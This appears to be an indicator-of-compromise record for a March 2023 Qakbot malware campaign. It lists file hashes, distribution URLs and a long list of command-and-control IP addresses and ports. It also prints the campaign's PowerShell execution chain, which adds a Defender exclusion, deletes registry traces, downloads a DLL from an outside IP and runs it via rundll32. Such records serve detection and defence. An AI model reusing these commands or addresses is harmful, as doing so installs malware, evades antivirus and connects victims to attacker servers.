Qakbot_BB18_10.03.2023.txt
10.03.2023 | Qakbot | BB18 | Campaign 1678346017 | 404.226
*************************************************
.html List.html
.js 9e1c6fc98aeadf1af70f6edfd9b2584968f9340b4c86322e307131ed7de9a6db
.dll 4d1832d49f6695d8559fdcab96338ec1d4f2804f8f89a7f9dce40d5de1ee4aed
*************************************************
Exec
wscript.exe out.js
powershell.exe" -encodedcommand $hallucinator = Get-ItemProperty -Path HKCU:\\SOFTWARE\\WordspinnerNonsuches | %{$_.pabalumPhenazin}; $hallucinator = "AcousticallySuperalbuminosis" + $hallucinator; [Reflection.Assembly]::Load([Convert]::fromBase64String($hallucinator)); [classicyc1]::Execute("powershell -executionpolicy bypass -windowstyle hidden ""`$currentDrive = `(get-location`).Drive.Name + ':\'; Add-MpPreference -ExclusionPath `$currentDrive;Start-Sleep -Seconds 3;reg delete HKEY_CURRENT_USER\SOFTWARE\autoharpMaskette /v pabalumPhenazin /f""");Start-Sleep -Seconds 3;Invoke-WebRequest http://85.239.54.233/DmVW/1 -O $env:TEMP\hyperarchepiscopal.dll;start rundll32 $env:TEMP\\hyperarchepiscopal.dll,XL55;
rundll32.exe C:\Users\Admin\AppData\Local\Temp\\hyperarchepiscopal.dll XL55
*************************************************
distribution URLs
http://149.255.35.153/URME.php
http://149.255.35.189/LLIE.php
http://194.213.18.132/AIEO.php
http://194.37.97.154/EBU.php
http://37.72.174.5/OOED.php
http://45.66.249.196/UDT.php
http://85.239.54.220/UU.php
http://85.239.54.233/DmVW/1
http://85.239.53.76/31x/1
http://194.213.18.84/HYK8sNh/1
http://85.239.53.88/DJkEN/1
https://parallax-systems.com/7mBam/05
https://lamh.online/2FlJ/030
https://rk.eng.br/1zVX3d/05
https://ledapharma.com/2gjLX04/3
https://icradost.org/aSZW/09
*************************************************
C2s
114.143.176.235:443
92.154.17.149:2222
2.14.45.117:2222
84.108.200.161:443
109.11.175.42:2222
88.126.94.4:50000
87.202.101.164:50000
50.68.204.71:995
49.245.82.178:2222
12.172.173.82:32101
190.11.198.76:443
79.67.165.149:995
115.87.227.49:443
84.215.202.22:443
118.250.110.98:995
66.131.25.6:443
80.1.152.201:443
198.2.51.242:993
151.48.158.236:443
50.68.204.71:993
85.61.165.153:2222
84.35.26.14:995
197.92.136.122:443
174.4.89.3:443
187.199.103.21:32103
98.37.25.99:443
184.153.132.82:443
85.59.61.52:2222
103.231.216.238:443
162.248.14.107:443
50.68.186.195:443
2.82.8.80:443
74.92.243.113:50000
80.47.61.240:2222
108.190.203.42:995
24.69.84.237:443
184.176.110.61:61202
12.172.173.82:990
12.172.173.82:465
172.90.139.138:2222
72.80.7.6:50003
50.68.204.71:443
202.186.177.88:443
183.87.163.165:443
12.172.173.82:21
24.239.69.244:443
47.21.51.138:995
174.104.184.149:443
93.147.134.85:443
136.175.69.147:443
12.172.173.82:995
73.165.119.20:443
69.133.162.35:443
12.172.173.82:20
154.246.62.48:993
92.159.173.52:2222
74.66.134.24:443
12.172.173.82:2087
190.75.151.215:2222
94.63.65.146:443
108.44.207.232:443
174.58.146.57:443
116.75.63.136:443
180.151.104.240:443
103.123.223.121:443
103.252.7.231:443
12.172.173.82:22
212.70.107.156:2222
103.111.70.115:995
49.175.72.156:443
72.203.216.98:2222
173.18.126.3:443
86.250.10.160:2222
142.161.27.232:2222
103.42.86.110:995
75.143.236.149:443
91.169.12.198:32100
64.237.221.254:443
103.71.21.107:443
103.140.174.19:2222
172.248.42.122:443
69.164.228.175:443
59.28.84.65:443
184.176.35.223:2222
202.187.95.12:995
201.244.108.183:995
103.111.70.115:443
2.50.50.227:443
27.0.48.233:443
103.141.50.102:995
86.225.214.138:2222
12.172.173.82:50001
75.156.125.215:995
116.72.250.18:443
202.142.98.62:443
47.21.51.138:443
64.229.202.224:995
202.142.98.62:995
125.99.69.178:443
217.165.230.100:2222
82.212.111.148:443
98.145.23.67:443
47.203.229.168:443
77.86.98.236:443
50.67.17.92:443
176.142.207.63:443
73.36.196.11:443
35.143.97.145:995
90.104.22.28:2222
73.22.121.210:443
82.127.204.82:2222
45.50.233.214:443
47.34.30.133:443
24.117.237.157:443
76.170.252.153:995
81.229.117.95:2222
98.163.227.79:443
86.10.146.216:443